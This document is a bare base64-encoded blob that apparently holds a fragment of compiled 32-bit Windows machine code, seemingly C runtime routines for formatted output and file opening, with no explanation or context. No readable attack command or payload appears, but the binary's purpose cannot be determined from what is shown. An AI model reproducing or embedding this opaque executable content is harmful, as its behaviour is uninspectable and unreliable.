EBdQ+B+QDGBRB0B1Ho2ND//1nHRfz+////6FcAAABqDOhFHwAAWcdF/AEAAACLfmyF/3QjV+gP9v//WTs9jMoFEHQUgf+QygUQdAyDPwB1B1fomfT//1nHRfz+////6B4AAABW6IDQ//9Z6K8cAADCBACLdQhqDehYIAAAWcOLdQhqDOhMIAAAWcNVi+yhGMkFEIP4/3QnVot1CIX2dQ5Q6DtqAACL8KEYyQUQWWoAUOhKagAAWVlW6Jj+//9eXcNW6BIAAACL8IX2dQhqEOgH6f//WYvGXsNWV/8V2FIDEP81GMkFEIv46PNpAACL8FmF9nVHaLwDAABqAejpHwAAi/BZWYX2dDNW/zUYyQUQ6OtpAABZWYXAdBhqAFboJQAAAFlZ/xUMUgMQg04E/4kG6wlW6LHP//9ZM/ZX/xWcUgMQX4vGXsNqCGhYmwUQ6IYbAACLdQjHRlzoZgMQg2YIADP/R4l+FIl+cGpDWGaJhrgAAABmiYa+AQAAx0ZoAMYFEIOmuAMAAABqDejaHQAAWYNl/ACLRmiLz/APwQjHRfz+////6D4AAABqDOi5HQAAWYl9/ItFDIlGbIXAdQihjMoFEIlGbP92bOiL8v//WcdF/P7////oFQAAAOg9GwAAwzP/R4t1CGoN6OUeAABZw2oM6NweAABZw+ie6P//6JceAACFwHUI6GMAAAAzwMNojCgCEOiJaAAAoxjJBRBZg/j/dONWaLwDAABqAei3HgAAi/BZWYX2dC1W/zUYyQUQ6LloAABZWYXAdBtqAFbo8/7//1lZ/xUMUgMQg04E/4kGM8BAXsPoBAAAADPAXsOhGMkFEIP4/3QOUOhBaAAAgw0YyQUQ/1npER0AAGoIaICbBRDoQBoAAL6QygUQOTWMygUQdCpqDOi9HAAAWYNl/ABWaIzKBRDorPT//1lZo4zKBRDHRfz+////6AYAAADoSRoAAMNqDOj3HQAAWcNVi+yDfQgAdCZWi3UM90YMABAAAHQYVuga1P//gWYM/+7//zPAWYlGGIkGiUYIXl3DVYvsVot1CFboDtj//1DotnYAAFlZhcAPhIYAAABX6L/S//+DwCA78HUEM//rD+iv0v//g8BAO/B1ZjP/R/8FoOgFEPdGDAwBAAB1VIM8vQzpBRAAU7sAEAAAdSVT6L8dAACJBL0M6QUQWYXAdRONRhRqAolGCIkGWIlGGIlGBOsSiwy9DOkFEIlOCIkOiV4YiV4EgU4MAhEAADPAQFvrAjPAX15dw1WL7IHsiAQAAKFwzAUQM8WJRfyLRQiNjbD7//9TVomF2Pv//4tFDFf/dRCLfRSJhfj7//8zwIvYib3w+///iYWk+///i/CJnez7//+JhdD7//+Jhej7//+Jhdz7//+Jhaj7//+JhcD7//+JhdT7///oSc3//+hg7///iYWc+///OZ3Y+///dSroTe///8cAFgAAAOhF7P//OJ28+///dAqLhbj7//+DYHD9g8j/6fUKAACLlfj7//+F0nTMD7cSM8mJjfT7//+LwYmF4Pv//4mNzPv//4mNrPv//4mV5Pv//2aF0g+EqgoAAMeFkPv//1gAAADHhYz7//9kAAAAx4WI+///aQAAAMeFmPv//28AAACDhfj7//8ChcAPiHMKAABqWI1C4F9mO8d3Dw+3wg++gPhUAxCD4A/rAjPAi73M+///D768xxhVAxCLx4m9zPv//4u98Pv//8H4BImFzPv//4P4Bw+HCwoAAP8khdE4AhAzwION6Pv///+L2ImFqPv//4mFwPv//4mF0Pv//4mF3Pv//4md7Pv//4mF1Pv//+nQCQAAD7fCaiBaK8J0RoPoA3Q5g+gIdC9ISHQdg+gDi4X4+///D4WvCQAAg8sIiZ3s+///6aEJAACDywSJnez7///pjQkAAIPLAevwgcuAAAAA6+iDywLr42oqWGY70HUviweDxwSJvfD7//+JhdD7//+FwA+JWgkAAIPLBPfYiZ3s+///iYXQ+///6UQJAABrjdD7//8KD7fCg8HQA8GJhdD7///pJAkAADPAiYXo+///6R0JAABqKlhmO9B1K4sHg8cEiYXo+///hcCLhfj7//+JvfD7//8PifwIAACDjej7////6fAIAABrjej7//8KD7fCg8HQA8GJhej7///pyggAAA+3woP4SXRXg/hodEhqbFo7wnQag/h3i4X4+///D4WzCAAAgcsACAAA6fz+//+Lhfj7//9mORB1FIPAAoHLABAAAImF+Pv//+nd/v//g8sQ6dX+//9qIFgL2OnZ/v//i4X4+///D7cAg/g2dSOLvfj7//9mg38CNHUWi8eDwASBywCAAACJhfj7///pmv7//4P4M3Uji734+///ZoN/AjJ1FovHg8AEgeP/f///iYX4+///6XL+//9mO4WM+///D4QLCAAAZjuFiPv//w+E/gcAAGY7hZj7//8PhPEHAACD+HUPhOgHAACD+HgPhN8HAABmO4WQ+///D4TSBwAAM8CJhcz7//+NheD7///HhdT7//8BAAAAUP+12Pv//1LodxQAAIPEDOmfBwAAD7fCg/hkD48pAgAAD4SxAgAAg/hTD48lAQAAdH2D6EF0EEhIdFhISHQISEgPhZoFAABqIFgD0MeFqPv//wEAAACJleT7//+Lhej7//+Ntfz7//+Dy0C5AAIAAImd7Pv//4mN9Pv//4XAD4mOAgAAx4Xo+///BgAAAOnfAgAA98MwCAAAD4XYAAAAaiBYC9iJnez7///pyAAAAPfDMAgAAHULaiBYC9iJnez7//+Llej7//+/////f4P6/3QCi/qLtfD7//+DxgSJtfD7//+Ldvz2wyAPhL8EAACF9nUGizWAwgUQM8mLxomF5Pv//4mN9Pv//4X/D47QBAAAigCEwA+ExgQAAI2NsPv//w+2wFFQ6M1/AABZhcCLheT7//9ZdAFAi430+///QEGJheT7//+JjfT7//87z3zB6YwEAACD6FgPhNwCAABISA+EiwAAAIPoBw+E7f7//0hID4VqBAAAD7cHg8cEx4XU+///AQAAAIm98Pv//4mFoPv///bDIHREiIXE+///M8CIhcX7//+NhbD7//9Qi4Ww+////3B0jYXE+///UI2F/Pv//1DoLa0AAIPEEIXAeRPHhcD7//8BAAAA6wdmiYX8+///M8mNtfz7//9B6eoDAACLB4PHBIm98Pv//4XAdDaLcASF9nQv98MACAAAdBcPvwCZK8LHhdT7//8BAAAAi8jpswMAADPJiY3U+///D78I6aUDAACLNYDCBRBW6KVMAABZi8jpkQMAAIP4cA+P6wEAAA+E1wEAAIP4ZQ+MfwMAAIP4Zw+O8f3//2ppWjvCdGaD+G50J2pvWjvCD4VfAwAAx4Xk+///CAAAAITbeVuBywACAACJnez7///rTYPHBIm98Pv//4t//OiUfgAAhcAPhEUFAACLheD7///2wyB0BWaJB+sCiQfHhcD7//8BAAAA6cMEAACDy0CJnez7///HheT7//8KAAAA98MAgAAAdQz3wwAQAAAPhJcBAACLD4PHCIm98Pv//4t//OmwAQAAdRRqZ1hmO9B1VseF6Pv//wEAAADrSjvBfgiLwYmF6Pv//z2jAAAAfjeNuF0BAABX6HgWAACLleT7//+Jhaz7//9ZhcB0Covwib30+///6wrHhej7//+jAAAAi73w+///iweDxwiJhXj7//+JvfD7//+LR/yJhXz7//+NhbD7//9Q/7Wo+///D77C/7Xo+///UP+19Pv//42FePv//1ZQ/zXczAUQ/xU8UgMQ/9CL+4PEHIHngAAAAHQhg73o+///AHUYjYWw+///UFb/NejMBRD/FTxSAxD/0FlZamdYZjmF5Pv//3Uchf91GI2FsPv//1BW/zXkzAUQ/xU8UgMQ/9BZWYA+LQ+FHv7//4HLAAEAAEaJnez7///pDP7//8eF6Pv//wgAAABqB+scg+hzD4R7/P//SEgPhJL+//+D6AMPhYkBAABqJ8eF5Pv//xAAAABYiYWk+///hNsPiXj+//9qMFmDwFFmiY3I+///ZomFyvv//8eF3Pv//wIAAADpVf7//4PHBIm98Pv///bDIHQR9sNAdAYPv0f86w4Pt0f86wj2w0B0DItH/JmLyIv6M8DrB4tP/DPAi/j2w0B0HDv4fxh8BDvIcxL32RP499+BywABAACJnez7///3wwCQAAB1Aov4i5Xo+///hdJ5BTPSQusWg+P3iZ3s+///gfoAAgAAfgW6AAIAAIvBC8d1BomF3Pv//421+/3//4vCSomV6Pv//4XAfwaLwQvHdD2LheT7//+ZUlBXUehFfQAAg8EwiZ2E+///iYX0+///i/qD+Tl+BgONpPv//4uV6Pv//4gOTouN9Pv//+uwi53s+///jY37/f//K85GiY30+///98MAAgAAdEWFyXQFgD4wdDxOQWowWIgG6y2F9nUGizWEwgUQx4XU+///AQAAAIvOhf90DzPAT2Y5AXQHg8EChf918yvO0fmJjfT7//+DvcD7//8AD4WtAQAA9sNAdCD3wwABAAAPhB0BAABqLVhmiYXI+///x4Xc+///AQAAAGogWou90Pv//4uF3Pv//yv5K/j2wwx1HY2F4Pv//1D/tdj7//9XUuh7DgAAi4Xc+///g8QQ/7Wc+///jY3g+///Uf+12Pv//1CNhcj7//9Q6H4OAACDxBT2wwh0H/bDBHUajYXg+///UP+12Pv//1dqMFhQ6C4OAACDxBCDvdT7//8Ai4X0+///D4WzAAAAhcAPjqsAAACLzom15Pv//0iJhYT7//+NhbD7//9Qi4Ww+////3B0jYWg+///UVDoIKgAAIPEEImFlPv//4XAfmeNheD7//9Q/7XY+////7Wg+///6IkNAACLjeT7//+DxAwDjZT7//+LhYT7//+JjeT7//+FwH+Y61b2wwF0B2or6dn+///2wwIPhOL+//9qIFpmiZXI+///x4Xc+///AQAAAOnM/v//g8j/iYXg+///6yP/tZz7//+NjeD7//9R/7XY+///UFbodw0AAIPEFIuF4Pv//4XAeB/2wwR0Go2F4Pv//1D/tdj7//9XaiBYUOgiDQAAg8QQi4Ws+///hcB0D1DozMH//zPAWYmFrPv//4uN9Pv//4uF+Pv//w+3EIuF4Pv//4mV5Pv//2aF0g+FfvX//4C9vPv//wB0CouNuPv//4NhcP2LTfxfXjPNW+jMaQAAi+Vdw+gd5P//xwAWAAAA6BXh//+Avbz7//8AD4TV9P//i424+///g2Fw/enG9P//mTACEF8uAhCTLgIQ6C4CEDkvAhBGLwIQky8CEL4wAhBVi+yB7IgEAAChcMwFEDPFiUX8i0UIjY20+///U1aJhdj7//+LRQxX/3UQi30UiYX4+///M8CL2Im98Pv//4mFrPv//4vwiZ3s+///iYXQ+///iYXo+///iYXc+///iYWo+///iYWw+///iYXU+///6EXB///oXOP//4mFoPv//zmd2Pv//3Uq6Enj///HABYAAADoQeD//zidwPv//3QKi4W8+///g2Bw/YPI/+kQCwAAi5X4+///hdJ0zA+3EjPJiY30+///i8GJheD7//+Jjcz7//+JjaT7//+JleT7//9mhdIPhMUKAADHhZD7//9YAAAAx4WM+///ZAAAAMeFiPv//2kAAADHhZj7//9vAAAAg4X4+///AoXAD4h/CgAAaliNQuBfZjvHdw8Pt8IPtoBoZwMQg+AP6wIzwIu9zPv//2vACQ+2vDiIZwMQi8eJvcz7//+LvfD7///B6ASJhcz7//+D+AgPhJEKAACD+AcPhwsKAAD/JIUNRQIQM8CDjej7////i9iJhaj7//+JhbD7//+JhdD7//+Jhdz7//+Jnez7//+JhdT7///p0AkAAA+3wmogWivCdEaD6AN0OYPoCHQvSEh0HYPoA4uF+Pv//w+FrwkAAIPLCImd7Pv//+mhCQAAg8sEiZ3s+///6Y0JAACDywHr8IHLgAAAAOvog8sC6+NqKlhmO9B1L4sHg8cEib3w+///iYXQ+///hcAPiVoJAACDywT32Imd7Pv//4mF0Pv//+lECQAAa43Q+///Cg+3woPB0APBiYXQ+///6SQJAAAzwImF6Pv//+kdCQAAaipYZjvQdSuLB4PHBImF6Pv//4XAi4X4+///ib3w+///D4n8CAAAg43o+////+nwCAAAa43o+///Cg+3woPB0APBiYXo+///6coIAAAPt8KD+El0V4P4aHRIamxaO8J0GoP4d4uF+Pv//w+FswgAAIHLAAgAAOn8/v//i4X4+///ZjkQdRSDwAKBywAQAACJhfj7///p3f7//4PLEOnV/v//aiBYC9jp2f7//4uF+Pv//w+3AIP4NnUji734+///ZoN/AjR1FovHg8AEgcsAgAAAiYX4+///6Zr+//+D+DN1I4u9+Pv//2aDfwIydRaLx4PABIHj/3///4mF+Pv//+ly/v//ZjuFjPv//w+ECwgAAGY7hYj7//8PhP4HAABmO4WY+///D4TxBwAAg/h1D4ToBwAAg/h4D4TfBwAAZjuFkPv//w+E0gcAADPAiYXM+///jYXg+///x4XU+///AQAAAFD/tdj7//9S6GcIAACDxAzpnwcAAA+3woP4ZA+PKQIAAA+EsQIAAIP4Uw+PJQEAAHR9g+hBdBBISHRYSEh0CEhID4WaBQAAaiBYA9DHhaj7//8BAAAAiZXk+///i4Xo+///jbX8+///g8tAuQACAACJnez7//+JjfT7//+FwA+JjgIAAMeF6Pv//wYAAADp3wIAAPfDMAgAAA+F2AAAAGogWAvYiZ3s+///6cgAAAD3wzAIAAB1C2ogWAvYiZ3s+///i5Xo+///v////3+D+v90Aov6i7Xw+///g8YEibXw+///i3b89sMgD4S/BAAAhfZ1Bos1gMIFEDPJi8aJheT7//+JjfT7//+F/w+O0AQAAIoAhMAPhMYEAACNjbT7//8PtsBRUOi9cwAAWYXAi4Xk+///WXQBQIuN9Pv//0BBiYXk+///iY30+///O898wemMBAAAg+hYD4TcAgAASEgPhIsAAACD6AcPhO3+//9ISA+FagQAAA+3B4PHBMeF1Pv//wEAAACJvfD7//+JhZz7///2wyB0RIiFxPv//zPAiIXF+///jYW0+///UIuFtPv///9wdI2FxPv//1CNhfz7//9Q6B2hAACDxBCFwHkTx4Ww+///AQAAAOsHZomF/Pv//zPJjbX8+///QenqAwAAiweDxwSJvfD7//+FwHQ2i3AEhfZ0L/fDAAgAAHQXD78AmSvCx4XU+///AQAAAIvI6bMDAAAzyYmN1Pv//w+/COmlAwAAizWAwgUQVuiVQAAAWYvI6ZEDAACD+HAPj+sBAAAPhNcBAACD+GUPjH8DAACD+GcPjvH9//9qaVo7wnRmg/hudCdqb1o7wg+FXwMAAMeF5Pv//wgAAACE23lbgcsAAgAAiZ3s+///602DxwSJvfD7//+Lf/zohHIAAIXAD4RUBQAAi4Xg+///9sMgdAVmiQfrAokHx4Ww+///AQAAAOnDBAAAg8tAiZ3s+///x4Xk+///CgAAAPfDAIAAAHUM98MAEAAAD4SXAQAAiw+DxwiJvfD7//+Lf/zpsAEAAHUUamdYZjvQdVbHhej7//8BAAAA60o7wX4Ii8GJhej7//89owAAAH43jbhdAQAAV+hoCgAAi5Xk+///iYWk+///WYXAdAqL8Im99Pv//+sKx4Xo+///owAAAIu98Pv//4sHg8cIiYV4+///ib3w+///i0f8iYV8+///jYW0+///UP+1qPv//w++wv+16Pv//1D/tfT7//+NhXj7//9WUP813MwFEP8VPFIDEP/Qi/uDxByB54AAAAB0IYO96Pv//wB1GI2FtPv//1BW/zXozAUQ/xU8UgMQ/9BZWWpnWGY5heT7//91HIX/dRiNhbT7//9QVv815MwFEP8VPFIDEP/QWVmAPi0PhR7+//+BywABAABGiZ3s+///6Qz+///Hhej7//8IAAAAagfrHIPocw+Ee/z//0hID4SS/v//g+gDD4WJAQAAaifHheT7//8QAAAAWImFrPv//4TbD4l4/v//ajBZg8BRZomNyPv//2aJhcr7///Hhdz7//8CAAAA6VX+//+DxwSJvfD7///2wyB0EfbDQHQGD79H/OsOD7dH/OsI9sNAdAyLR/yZi8iL+jPA6weLT/wzwIv49sNAdBw7+H8YfAQ7yHMS99kT+PffgcsAAQAAiZ3s+///98MAkAAAdQKL+IuV6Pv//4XSeQUz0kLrFoPj94md7Pv//4H6AAIAAH4FugACAACLwQvHdQaJhdz7//+Ntfv9//+LwkqJlej7//+FwH8Gi8ELx3Q9i4Xk+///mVJQV1HoNXEAAIPBMImdhPv//4mF9Pv//4v6g/k5fgYDjaz7//+Llej7//+IDk6LjfT7///rsIud7Pv//42N+/3//yvORomN9Pv///fDAAIAAHRFhcl0BYA+MHQ8TkFqMFiIBusthfZ1Bos1hMIFEMeF1Pv//wEAAACLzoX/dA8zwE9mOQF0B4PBAoX/dfMrztH5iY30+///g72w+///AA+FrQEAAPbDQHQg98MAAQAAD4QdAQAAai1YZomFyPv//8eF3Pv//wEAAABqIFqLvdD7//+Lhdz7//8r+Sv49sMMdR2NheD7//9Q/7XY+///V1LoawIAAIuF3Pv//4PEEP+1oPv//42N4Pv//1H/tdj7//9QjYXI+///UOhuAgAAg8QU9sMIdB/2wwR1Go2F4Pv//1D/tdj7//9XajBYUOgeAgAAg8QQg73U+///AIuF9Pv//w+FswAAAIXAD46rAAAAi86JteT7//9IiYWE+///jYW0+///UIuFtPv///9wdI2FnPv//1FQ6BCcAACDxBCJhZT7//+FwH5njYXg+///UP+12Pv///+1nPv//+h5AQAAi43k+///g8QMA42U+///i4WE+///iY3k+///hcB/mOtW9sMBdAdqK+nZ/v//9sMCD4Ti/v//aiBaZomVyPv//8eF3Pv//wEAAADpzP7//4PI/4mF4Pv//+sj/7Wg+///jY3g+///Uf+12Pv//1BW6GcBAACDxBSLheD7//+FwHgf9sMEdBqNheD7//9Q/7XY+///V2ogWFDoEgEAAIPEEIuFpPv//4XAdA9Q6Ly1//8zwFmJhaT7//+LjfT7//+Lhfj7//8PtxCLheD7//+JleT7//9mhdIPhXL1//+Ljcz7//+FyXQFg/kHdVCAvcD7//8AdAqLjbz7//+DYXD9i038X14zzVvorV0AAIvlXcPo/tf//8cAFgAAAOj21P//gL3A+///AA+EuvT//4uNvPv//4NhcP3pq/T//+jS1///xwAWAAAA6MrU//+AvcD7//8A6YP0//+QqTwCEG86AhCjOgIQ+DoCEEk7AhBWOwIQozsCEM48AhBVi+yLRQz2QAxAdAaDeAgAdB1Q/3UI6NGYAABZWbn//wAAZjvBdQiLRRCDCP9dw4tFEP8AXcNVi+xWi3UMhfZ+HleLfRRX/3UQTv91COiu////g8QMgz//dASF9n/nX15dw1WL7FaLdRhXi30QiwaJRRj2RwxAdBCDfwgAdQqLTRSLRQwBAetPgyYAU4tdDIXbfkGLRRRQi0UIS1cPtwBQ6Fv///+LRRSDxAyDRQgCgzj/dRSDPip1E1BXaj/oPv///4tFFIPEDIXbf8qDPgB1BYtFGIkGW19eXcPMzMzMzMzMzGhwRgIQZP81AAAAAItEJBCJbCQQjWwkECvgU1ZXoXDMBRAxRfwzxVCJZej/dfiLRfzHRfz+////iUX4jUXwZKMAAAAAw4tN8GSJDQAAAABZX19eW4vlXVHDzMzMzMzMzFWL7IPsGFOLXQxWV8ZF/wCLewiNcxAzPXDMBRDHRfQBAAAAiweD+P50DYtPBAPOMwww6MZbAACLRwiLTwwDzjMMMOi2WwAAi0UI9kAEZg+FzwAAAIlF6ItFEIlF7I1F6IlD/ItDDIlF+IP4/g+E7QAAAI0EQI1ABItMhwSNBIeLGIlF8IXJdHuL1uhDEwAAsQGITf+FwA+IfgAAAH5oi0UIgThjc23gdSiDPYj4BRAAdB9oiPgFEOi0UAAAg8QEhcB0DmoB/3UI/xWI+AUQg8QIi1UIi00M6CYTAACLRQyLVfg5UAx0EGhwzAUQVovI6CcTAACLRQyJWAyLB4P4/nR162aKTf+JXfiLw4P7/g+FXv///4TJdEfrIcdF9AAAAADrGIN7DP50NmhwzAUQVovLuv7////o4BIAAIsHg/j+dA2LTwQDzjMMMOiuWgAAi1cIi08MA84zDDLonloAAItF9F9eW4vlXcOLTwQDzjMMMOiHWgAAi0cIi08MA84zDDDod1oAAItN8IvWi0kI6FYSAADMahBooJsFEOgA/v//M/+JfeRqAeiFAAAAWSF9/GoDXol14Ds1xAgGEH1TocAIBhCLBLCFwHRE9kAMg3QQUOijvf//WYP4/3QER4l95IP+FHwpocAIBhCLBLCDwCBQ/xXsUQMQocAIBhD/NLDorLH//1mhwAgGEIMksABG66LHRfz+////6AsAAACLx+jB/f//w4t95GoB6GwBAABZw1WL7FaLdQiDPPVQywUQAHUTVuhxAAAAWYXAdQhqEehNyv//Wf809VDLBRD/FUxSAxBeXcNWV75QywUQi/5Tix+F23QXg38EAXQRU/8V7FEDEFPoKLH//4MnAFmDxwiB/3DMBRB82FuDPgB0DoN+BAF1CP82/xXsUQMQg8YIgf5wzAUQfOJfXsNqCGjAmwUQ6Nv8//+DPejoBRAAdRjo9BwAAGoe6EodAABo/wAAAOiayP//WVmLfQgz2zkc/VDLBRB1XGoY6P0AAABZi/CF9nUP6FDT///HAAwAAAAzwOtCagroGf///1mJXfw5HP1QywUQdRhTaKAPAABW6LdKAACDxAyJNP1QywUQ6wdW6G2w//9Zx0X8/v///+gJAAAAM8BA6I38///DagroOwAAAFnDVle+UMsFEL8Y6QUQg34EAXUWagCJPoPHGGigDwAA/zboYUoAAIPEDIPGCIH+cMwFEHzZM8BfQF7DVYvsi0UI/zTFUMsFEP8VSFIDEF3DVYvsVlcz9moA/3UM/3UI6KFpAACL+IPEDIX/dSU5BWjqBRB2HVboBk0AAIHG6AMAAFk7NWjqBRB2A4PO/4P+/3XFi8dfXl3DVYvsU1ZXiz1o6gUQM/b/dQjoS77//4vYWYXbdSOF/3QfVujCTAAAiz1o6gUQgcboAwAAWTv3dgODzv+D/v91zl9ei8NbXcNVi+xWVzP2/3UM/3UI6OuVAACL+FlZhf91KjlFDHQlOQVo6gUQdh1W6HVMAACBxugDAABZOzVo6gUQdgODzv+D/v91w4vHX15dw1WL7FZXM/b/dRD/dQz/dQjoSZYAAIv4g8QMhf91KjlFEHQlOQVo6gUQdh1W6CdMAACBxugDAABZOzVo6gUQdgODzv+D/v91v4vHX15dw2oUaOCbBRDovfr//zP2iXXki30Ig//+dRDoYtH//8cACQAAAOm3AAAAhf8PiJ8AAAA7PYT4BRAPg5MAAACLx8H4BYlF4Ivfg+MfweMGiwSFcOoFEA++RAMEg+ABdHJX6PcOAABZiXX8i0XgiwSFcOoFEPZEAwQBdChX6JkRAABZUP8V7FIDEIXAdQj/FdhSAxCL8Il15IX2dBjordD//4kw6NrQ///HAAkAAACDzv+JdeTHRfz+////6AoAAACLxushi30Ii3XkV+gzEgAAWcPoq9D//8cACQAAAOijzf//g8j/6Cb6///DahBoAJwFEOjU+f//M9uJXeSLdQiD/v51F+hF0P//iRjoctD//8cACQAAAOm2AAAAhfYPiJcAAAA7NYT4BRAPg4sAAACL3sH7BYv+g+cfwecGiwSdcOoFEA++RDgEg+ABdQro/M///4MgAOtqVugADgAAWYNl/ACLBJ1w6gUQ9kQ4BAF0E/91EP91DFboYQAAAIPEDIv46xbo+s///8cACQAAAOi7z///gyAAg8//iX3kx0X8/v///+gKAAAAi8frKIt1CIt95FboSxEAAFnD6I/P//+JGOi8z///xwAJAAAA6LTM//+DyP/oN/n//8PMzMxVi+y48BoAAOjhlAAAoXDMBRAzxYlF/IOlROX//wCLRQiLTQxWM/aJhTjl//9XM/+JjTDl//+JtUDl//85dRB1BzPA6Q0IAACFyXUf6CDP//8hMOhNz///xwAWAAAA6EXM//+DyP/p6gcAAIvQi8jB+gWD4R/B4QaJlSjl//9TixSVcOoFEImNJOX//4pcESQC29D7gPsCdAWA+wF1K4tFEPfQqAF1HOjFzv//ITDo8s7//8cAFgAAAOjqy///6YgHAACLhTjl///2RBEEIHQPagJqAGoAUOhiVgAAg8QQ/7U45f//6ARVAABZhcAPhFADAACLhSjl//+LjSTl//+LBIVw6gUQ9kQBBIAPhDIDAADov9v//zPJi0BsOYioAAAAjYUY5f//UIuFKOX//w+UwYmNPOX//4uNJOX//4sEhXDqBRD/NAH/FeRRAxCFwA+E7gIAADm1POX//3QIhNsPhN4CAAD/FehRAxCLlTDl//8zySGNOOX//4mFEOX//4mNNOX//4mVLOX//zlNEA+GgQYAAIuFLOX//zPSiZVA5f//x4UU5f//CgAAACG9POX//4TbD4WuAQAAihAzwIuNJOX//4D6Cg+UwImFGOX//4uFKOX//4sEhXDqBRCJhTzl//85fAE4dByKRAE0iEX0i4U85f//iFX1agIhfAE4jUX0UOtaD77CUOirYgAAWYXAdESLhTDl//+LlSzl//8rwgNFEIP4AQ+G2wEAAGoCUo2FNOX//1DoNpEAAIPEDIP4/w+EBQMAAIuFLOX//0D/hUDl///rJmoB/7Us5f//jYU05f//UOgHkQAAg8QMg/j/D4TWAgAAi4Us5f//M8lA/4VA5f//UVFqBYmFLOX//41F9FBqAY2FNOX//1BR/7UQ5f///xUUUgMQiYU85f//hcAPhJUCAABqAI2NOOX//1GLjSTl//9QjUX0UIuFKOX//4sEhXDqBRD/NAH/FcRSAxCFwA+ETAEAAIu1QOX//4uNROX//wPxi4U85f//OYU45f//D4xJAgAAOb0Y5f//dEuLjSTl//+NhTjl//9qAFBqAY1F9MZF9A1Qi4Uo5f//iwSFcOoFEP80Af8VxFIDEIXAD4TtAAAAg7045f//AQ+M9wEAAP+FROX//0aLjTTl///phgAAAID7AXQFgPsCdTMPtwgz0mY7jRTl//+JjTTl//8PlMKDwAKJlTzl//+LlUDl//+DwgKJhSzl//+JlUDl//+A+wF0BYD7AnVLUejpkAAAWYuNNOX//2Y7wXV1g8YCOb085f//dCJqDVhQiYU05f//6MOQAABZi4005f//ZjvBdU9G/4VE5f//i5VA5f//i4Us5f//O1UQD4Kp/f//6UUBAACLnSjl//9GigKLlSTl//+LDJ1w6gUQiEQKNIsEnXDqBRDHRAI4AQAAAOkXAQAA/xXYUgMQi/jpCgEAAIuFKOX//4sMhXDqBRCLhSTl///2RAgEgA+EdQMAAIuVMOX//zP/ib005f//hNsPhQ4BAACLXRCJlTjl//+F2w+EjQMAADPJjb306///i8KJjTzl//8rhTDl//87w3NEigpCQIiNH+X//4D5ComVOOX//4uNPOX//3UL/4VE5f//xgcNR0GKlR/l//+IF0eLlTjl//9BiY085f//gfn/EwAAcriLjSTl//+NhfTr//8r+I2FIOX//2oAUFeNhfTr//9Qi4Uo5f//iwSFcOoFEP80Af8VxFIDEIXAD4QT////A7Ug5f//Ob0g5f//fBaLlTjl//+LwiuFMOX//zvDD4JB////i7005f//i41E5f//hfYPhfUCAACF/w+ErAIAAGoFWzv7D4WYAgAA6DLK///HAAkAAADo88n//4kY6cYCAACLyoD7Ag+F6gAAADl1EA+GfAIAAMeFFOX//woAAACDpRjl//8AjZ306///i8FqDSvCi5UY5f//XjtFEHMzD7c5g8ACg8ECZju9FOX//3UQg4VE5f//AmaJM4PDAoPCAmaJO4PCAoPDAoH6/hMAAHLIjYX06///iY085f//i40k5f//K9hqAI2FIOX//1BTjYX06///UIuFKOX//4sEhXDqBRD/NAH/FcRSAxCLtUDl//+LvTTl//+FwA+E8v3//w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